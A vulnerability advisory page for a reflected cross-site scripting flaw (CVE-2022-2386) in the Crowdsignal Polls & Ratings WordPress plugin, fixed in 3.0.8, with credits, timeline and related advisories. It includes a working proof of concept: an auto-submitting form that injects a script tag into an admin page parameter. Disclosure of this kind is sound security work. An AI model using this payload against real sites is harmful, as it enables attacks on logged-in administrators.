Crowdsignal Polls & Ratings < 3.0.8 – Reflected Cross-Site Scripting | CVE 2022-2386 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/edit.php?post_type=feedback&page=polls&action=edit" id="hack" method="POST">
      <input type="hidden" name="mediaType[999999999]" value=""><script>alert(/XSS/)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>

Affects Plugins

Fixed in 3.0.8

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of WuHan University

Submitter

ZhongFu Su(JrXnm) of WuHan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

47855d4b-9f6a-4fc7-b231-4337f51c8886

Timeline

Publicly Published

2022-07-18 (about 1 years ago)

Added

2022-07-18 (about 1 years ago)

Last Updated

2023-04-15 (about 1 years ago)

Other

Published

Title

Published

2021-08-11

Title

Per Page Add to Head <= 1.4.4 - Authenticated Stored XSS

Published

2024-04-25

Title

The Plus Addons for Elementor < 5.5.0 - Contributor+ Stored Cross-Site Scripting via Countdown Widget

Published

2023-01-04

Title

Themify Shortcodes < 2.0.8 - Contributor+ Stored XSS via Shortcode

Published

2022-08-29

Title

Form Builder CP < 1.2.32 - Admin+ Stored Cross-Site Scripting

Published

2024-04-03

Title

Better Comments < 1.5.6 - Subscriber+ Stored XSS